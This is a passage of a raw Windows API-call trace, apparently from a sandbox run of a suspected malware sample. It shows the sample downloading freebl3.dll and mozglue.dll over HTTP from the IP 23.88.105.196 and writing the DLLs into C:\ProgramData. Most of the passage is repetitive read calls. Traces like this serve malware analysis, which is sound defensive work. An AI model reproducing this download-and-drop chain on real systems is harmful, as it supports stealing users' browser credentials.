dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3921ff8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.617] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39223e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39223e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.617] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39227c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39227c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.618] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3922bb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3922bb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.618] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3922f98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3922f98*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3923380, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3923380*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3923768, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3923768*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3923b50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3923b50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3923f38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3923f38*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3924320, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3924320*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3924708, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3924708*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3924af0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3924af0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3924ed8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3924ed8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.622] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39252c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39252c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.622] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39256a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39256a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.622] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3925a90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3925a90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.622] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x43800) returned 0x3970048 [0106.627] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea170 | out: hHeap=0x29a0000) returned 1 [0106.630] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39abd50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39abd50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.631] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ac138, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ac138*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.631] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ac520, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ac520*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.631] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ac908, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ac908*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.648] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0 | out: lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0) returned 0 [0106.648] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0106.648] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0106.648] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0106.648] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1068 | out: hHeap=0x29a0000) returned 1 [0106.648] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0106.648] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0106.648] CreateFileA (lpFileName="C:\\ProgramData\\\\freebl3.dll" (normalized: "c:\\programdata\\freebl3.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0106.649] WriteFile (in: hFile=0x28, lpBuffer=0x3970048*, nNumberOfBytesToWrite=0x519d0, lpNumberOfBytesWritten=0x19f6e0, lpOverlapped=0x0 | out: lpBuffer=0x3970048*, lpNumberOfBytesWritten=0x19f6e0*=0x519d0, lpOverlapped=0x0) returned 1 [0106.656] CloseHandle (hObject=0x28) returned 1 [0106.663] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0106.663] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1068 [0106.663] GetLastError () returned 0x0 [0106.663] SetLastError (dwErrCode=0x0) [0106.664] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0106.664] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x19f684, dwBufferLength=0x4) returned 1 [0106.664] InternetConnectA (hInternet=0xcc0004, lpszServerName="23.88.105.196", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0106.664] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/mozglue.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0106.664] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a11c0 [0106.664] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0106.664] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0106.664] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0106.664] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0106.664] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0106.664] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0106.714] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.714] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970048, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970048*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.715] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970430, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970430*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.716] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970818, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970818*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.716] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970c00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970c00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.716] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970fe8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970fe8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.716] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39713d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39713d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.716] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39717b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39717b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.716] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3971ba0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3971ba0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3971f88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3971f88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972370, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972370*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972758, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972758*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972b40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972b40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972f28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972f28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.718] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3973310, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3973310*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.718] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39736f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39736f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.718] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3973ae0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3973ae0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.718] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3973ec8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3973ec8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.718] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39742b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39742b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.718] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3974698, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3974698*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.718] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3974a80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3974a80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.718] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3974e68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3974e68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975250, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975250*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975638, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975638*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975a20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975a20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975e08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975e08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39761f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39761f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39765d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39765d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.720] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39769c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39769c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.720] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3976da8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3976da8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.720] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977190, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977190*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.720] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977578, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977578*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.720] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977960, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977960*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.720] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977d48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977d48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978130, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978130*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978518, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978518*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978900, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978900*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978ce8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978ce8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39790d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39790d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39794b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39794b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39798a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39798a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.722] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3979c88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3979c88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.722] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397a070, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397a070*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.722] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397a458, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397a458*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.722] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397a840, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397a840*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.722] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397ac28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397ac28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.722] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397b010, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397b010*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397b3f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397b3f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397b7e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397b7e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397bbc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397bbc8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397bfb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397bfb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397c398, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397c398*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397c780, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397c780*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397cb68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397cb68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397cf50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397cf50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397d338, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397d338*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397d720, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397d720*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397db08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397db08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397def0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397def0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397e2d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397e2d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397e6c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397e6c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397eaa8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397eaa8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397ee90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397ee90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397f278, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397f278*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397f660, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397f660*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397fa48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397fa48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.726] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397fe30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397fe30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.726] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3980218, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3980218*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.726] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3980600, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3980600*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.726] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39809e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39809e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.726] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3980dd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3980dd0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.726] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39811b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39811b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39815a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39815a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3981988, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3981988*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3981d70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3981d70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982158, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982158*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982540, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982540*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982928, dwNumberOfBytesToRead=0x3e8, 